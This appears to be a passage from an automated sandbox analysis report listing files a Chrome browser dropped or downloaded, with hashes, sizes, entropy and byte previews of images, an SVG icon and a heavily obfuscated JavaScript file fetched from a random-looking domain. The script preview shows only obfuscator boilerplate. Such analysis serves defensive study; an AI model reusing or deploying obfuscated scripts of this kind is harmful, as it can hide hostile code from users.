                                                SHA1:499E3083BF3D1CFA54159BBADB6AA43674A7A5E3
                                                SHA-256:28F27657EA2D3EB07A001898C8B15F24E5A7241184FD24B5B0CDF29E5026D004
                                                SHA-512:7DE01004CEE45042AFFBEDD18E0DF1EE3B49491684F6AD67124A7D5CF618C30A3799DA963E97D3EFE26707F67E0B3B8A4CE99BA4954C638BE030C8EDF33D6EDD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR...8...y.....z,......pHYs..........+.... .IDATx..i.$.%v|.-......4.&.=......I6...V..&.67.U........p.=<".*. P..CKf.....P....2c.ADDDDDD.7...._.?...u....[...z._..u....M...7.0....:+.(.......l.as.+]....}...y.K`...l.S..{.DDDDDDD|#..........1..}7L.{...0.00.3..>...f...zw.V.{v.rk.}W@.7...z.`>l.@..}..[!9.3.l...=.....7.c_DDDDDD..HpDDDDDD|[0.av....p.......l_0..fv6.\..%Tm...hc....v.}.n.9.............A....C...!.8...u<Gp;...G..!>$<...l....=...H......A.w..._CQ...DDDDDD...b.JDDDDD._.....-z....`..h.=.P..H.......{*m.*.Fi4J.i.[)..5.V.nZ(M........;.....j.*...z..V.....m..m.....h..9.<A.J$R@p.....3 K%.DBr..'8.4A..pK.$B ....H$..sO.|.}.....A....v.=2.GDDDDDD|sD.GDDDDD.......7j.f.C..sg.(....*#.o.5..DXh..um..v.;u.'7Ze...mI.ViT.BY5Dp0..4.V.i....V.a+.6..%8...tD.3........i..B...<.%..in.K.9.....R.j.c.8C.Idi.!..0.3f.....R0.R M$.D ..........g..$q../3.{...B.1.9.A.]f.S...{..n_.4....1...H.DDDDDD.E$8""""""...T.......-.......1..PZ.....M......l...l...e.jZl....AU....*5.'
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1136x870, components 3
                                                Category:dropped
                                                Size (bytes):356207
                                                Entropy (8bit):7.935369891681601
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:6DCE45A016B43F68A7CF3F627131E676
                                                SHA1:2F0F5E7C1BB747537FFF2E490357C8147195C6DF
                                                SHA-256:05ECE8A8347436837CE68B99C2D0D8E0FB5842DA5A0E81C10D64D05244FDFC70
                                                SHA-512:6B756DD82500DC4937A769D76E6B5619D913B703281F8BA68F5A174D53023266BDB319198122E11D696BF27212D3BF222D58FE05FC8BD2263060D2477CD44A4F
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:......JFIF.....H.H.....C....................................................................C.......................................................................f.p...........................................N......................!...1AQa."q..2..#B.....R...$3bCr.%4..DS.5c..T&sEd...................................C.....................!1A.Qa..."q..2b.....BR..r......#.Cc....S................?..6.<Z@..Z.[].JF...H0H...c...w.%O.Z.u.....^+)D-C.h(30L.......hyW.....h:^E.. .I.X'{.....ZX.h.)..VB.H..mi.`e>......e@%d. .('.y*..\....e..+Pi.5.....A>d*L.M........a._H.=0 ]6S...@:...O.m`.GT..a..K...AR.B.Q.!.(..Y1pt. .2O........U..-...%Q.Yr,... ..bC....,.ay&l.).Q.|...G.8..4.H...Ru..$.:.R..2..U,=ux...."Ie...d).R% .0.(S....p.8...6D*n...-...0.....@[.JHT4L,$..Cr..x..ej..O...UT.]E..).~*.d.A2.`..(&....R.rG..8.Te.D...>.&........o.6.yj.<.R.Hc2RK.Y..p$2.I.B..cB."R0..uye{..-...A^...ap...+.u!.?.]*......BT..F.)u..%b -.[Pq...T.<...S..U3P.`...P..N...X.!B[u<-.I....0..e...V.P.....
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:downloaded
                                                Size (bytes):222435
                                                Entropy (8bit):4.836984325767447
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:8DBA8AA6C5E262AB84EB84F25C9E2478
                                                SHA1:A89DAC227BD81E0B818F44AAF3209786D7AC94AC
                                                SHA-256:092BA64D98D98AA0EF5E78073DCA8A49934B98A2DFB7415CD2FE967A3561A9A1
                                                SHA-512:F30C728C0366A16E2887E6C74D553973693A8A06AD4A28097FC1EAD1DB8F1B59CFC21275C2F669F2F620AE42F12C0D7F2C4FE18708ED8123458828E1C8C4C5BB
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://dajajkfifofjfklaiotjapp.com/main99.js
                                                Preview:(function(_0x13df31,_0x37d9c0){function _0x37295a(_0x230e6a,_0xa93414,_0xf7d966,_0x47cee3,_0xca42bb){return _0x19af(_0xa93414- -0x2c5,_0x230e6a);}function _0x52cd3a(_0x5d3e14,_0x5d15c2,_0x497952,_0x18d05d,_0x2b89c4){return _0x19af(_0x497952- -0x204,_0x5d3e14);}function _0x577060(_0x2074ac,_0x4119f5,_0x2a7337,_0x4b716e,_0xa10627){return _0x19af(_0xa10627- -0x36d,_0x2a7337);}function _0xde15b3(_0x398fcf,_0x575738,_0x10fb01,_0x42df88,_0x4baae3){return _0x19af(_0x42df88-0xde,_0x10fb01);}function _0x33392d(_0x35cf07,_0xda1e37,_0x17d1a7,_0x100e8d,_0x2382c2){return _0x19af(_0x2382c2-0x2b1,_0xda1e37);}const _0x40c507=_0x13df31();while(!![]){try{const _0x5187b8=parseInt(_0x52cd3a(0x9d4,0x4da,0x758,0x932,0xaec))/(-0x1*-0x164+0xdd*0x2b+0x6*-0x66b)*(parseInt(_0x52cd3a(-0x48,-0x526,-0xe8,0x1e4,0x6d))/(-0x423*0x4+-0xb*0x363+-0xac3*-0x5))+-parseInt(_0x52cd3a(0x6c,0x2ab,0x30c,0x176,0x114))/(0x1f23+0x74c+-0x1*0x266c)+-parseInt(_0x52cd3a(0x3dc,0x40d,0xe4,-0x25e,-0x156))/(0x1d7d+0x48e+-0x1f*0x119)*(-pars
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:downloaded
                                                Size (bytes):679
                                                Entropy (8bit):4.418965659676573
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:2F76733C0ADFB99D827AE4364282DD09
                                                SHA1:DA6A3DDBCD8CF7CE4AFF701E06D87A5DE59D726B
                                                SHA-256:B1CF6F792717EA49B7C00E59E31D40D8B96A10966FBB0CF69935AB729D2A46C5
                                                SHA-512:7F74192810D2B250D49C2A653D31D0E97F491DF39564553638C428637B8EA4CF8A3515D8059F20BCE730C68E401D21C234BE849D8EAACC87D04483A901F2CADA
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/uploads/2023/11/The-Latest.svg
                                                Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 28 28" fill="none">. <path d="M5 18C7.75 18 10 20.25 10 23C10 25.8125 7.75 28 5 28C2.1875 28 0 25.8125 0 23C0 20.25 2.1875 18 5 18ZM5 26C6.625 26 8 24.6875 8 23C8 21.375 6.625 20 5 20C3.3125 20 2 21.375 2 23C2 24.6875 3.3125 26 5 26ZM1 0C15.875 0 28 12.125 28 27C28 27.5625 27.5 28 27 28C26.4375 28 26 27.5625 26 27C26 13.25 14.75 2 1 2C0.4375 2 0 1.5625 0 1C0 0.5 0.4375 0 1 0ZM1 9C10.875 9 19 17.125 19 27C19 27.5625 18.5 28 18 28C17.4375 28 17 27.5625 17 27C17 18.1875 9.8125 11 1 11C0.4375 11 0 10.5625 0 10C0 9.5 0.4375 9 1 9Z" fill="#181249"></path>.</svg>.
                                                No static file info